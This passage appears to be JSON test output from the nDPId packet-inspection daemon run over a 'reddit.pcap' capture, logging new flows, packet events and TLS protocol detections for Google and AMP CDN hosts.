+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9286,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gDhWZACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGYBu2Ns154AAAAAoAL9IJ6VAAACBAWgBAIICriVOzQAAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9287,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9287,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gB5miACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGgBu54QLUEAAAAAoAL9IA5NAAACBAWgBAIICriVOzQAAAAAAQMDBw=="} 
+00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9288,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9288,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gCQMiACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGoBuxhoCyUAAAAAoAL9ILYPAAACBAWgBAIICriVOzQAAAAAAQMDBw=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9293,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1605291690952,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690952,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu21pGefV\/3l9HVoBJXgDRiAAACBAV4AQMDAwQCCArC10u2GsMWnw=="} 
+00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9294,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1605291690952,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690952,"pkt":"qtsDr8lk5EKm5WPyht1gDDgdACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttYBu\/eX0dWRnn1ggBAB+7hZAAABAQgKGsMWucLXS7Y="} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9298,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690953,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690953,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9300,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1605291690954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690954,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu22KVwltPCUkXloBJXgMhIAAACBAV4AQMDAwQCCArC10u9GsMWnw=="} 
+00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9301,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1605291690954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690954,"pkt":"qtsDr8lk5EKm5WPyht1gDtx5ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttgBu8JSReWlcJbUgBAB+0w+AAABAQgKGsMWu8LXS70="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9302,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1605291690954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690954,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu22it1t9ZMt7NvoBJXgClQAAACBAV4AQMDAwQCCArC10u9GsMWnw=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9303,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1605291690954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690954,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu23LTmo6vQxszqoBJXgBZ9AAACBAV4AQMDAwQCCArC10u9GsMWnw=="} 
+00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9304,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1605291690954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690954,"pkt":"qtsDr8lk5EKm5WPyht1gDhnPACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttoBu0y3s28rdbfXgBAB+61FAAABAQgKGsMWu8LXS70="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9305,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1605291690954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690954,"pkt":"qtsDr8lk5EKm5WPyht1gAc2lACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttwBu9DGzOq05qOsgBAB+5pyAAABAQgKGsMWu8LXS70="} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9306,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690954,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690954,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9307,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690954,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690954,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9308,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9309,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1605291690955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690955,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu23lfa6eczuyRVoBJXgHLsAAACBAV4AQMDAwQCCArC10u9GsMWnw=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9310,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1605291690955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690955,"pkt":"qtsDr8lk5EKm5WPyht1gClWEACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABtt4BuzO7JFVX2unogBAB+\/bgAAABAQgKGsMWvMLXS70="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9311,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1605291690955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690955,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgRAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbuVFgHH2llkCsoHoBJXgJ6iAAACBAV4AQMDAwQCCArC10u9qlQMrQ=="} 
+00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9312,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1605291690955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690955,"pkt":"qtsDr8lk5EKm5WPyht1gBhSQACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIEQAAAAAAACAKlRYBu2QKygcBx9pagBAB+yKXAAABAQgKqlQMysLXS70="} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9313,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9314,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9315,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1605291690956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690956,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQZEy\/C8or4r7coBJXgC2BAAACBAV4AQMDAwQCCArC10u+uJU7NA=="} 
+00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9316,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1605291690956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690956,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQZgWfUkJjbNefoBJXgN3ZAAACBAV4AQMDAwQCCArC10u+uJU7NA=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9317,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1605291690956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690956,"pkt":"qtsDr8lk5EKm5WPyht1gBnVWACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGQBuyvivtxMvwvLgBAB+7F0AAABAQgKuJU7UsLXS74="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9318,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1605291690956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690956,"pkt":"qtsDr8lk5EKm5WPyht1gDhWZACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGYBu2Ns158Fn1JDgBAB+2HNAAABAQgKuJU7UsLXS74="} 
+00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9319,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690956,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9320,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690956,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9321,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1605291690957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690957,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQan0Owi4YaAsmoBJXgA33AAACBAV4AQMDAwQCCArC10u\/uJU7NA=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9322,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1605291690957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690957,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQaPhCx3meEC1CoBJXgOW1AAACBAV4AQMDAwQCCArC10u+uJU7NA=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9323,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1605291690957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690957,"pkt":"qtsDr8lk5EKm5WPyht1gCQMiACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGoBuxhoCyZ9DsIvgBAB+5HpAAABAQgKuJU7U8LXS78="} 
+00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9324,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1605291690957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690957,"pkt":"qtsDr8lk5EKm5WPyht1gB5miACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGgBu54QLUL4Qsd6gBAB+2moAAABAQgKuJU7U8LXS74="} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9325,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690957,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9326,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690957,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690990,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690990,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9357,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690992,"flow_last_seen":1605291690992,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690992,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9357,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1605291690992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690992,"pkt":"qtsDr8lk5EKm5WPyht1gDPazACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGwBu4uuzGcAAAAAoAL9IIFCAAACBAWgBAIICriVO3YAAAAAAQMDBw=="} 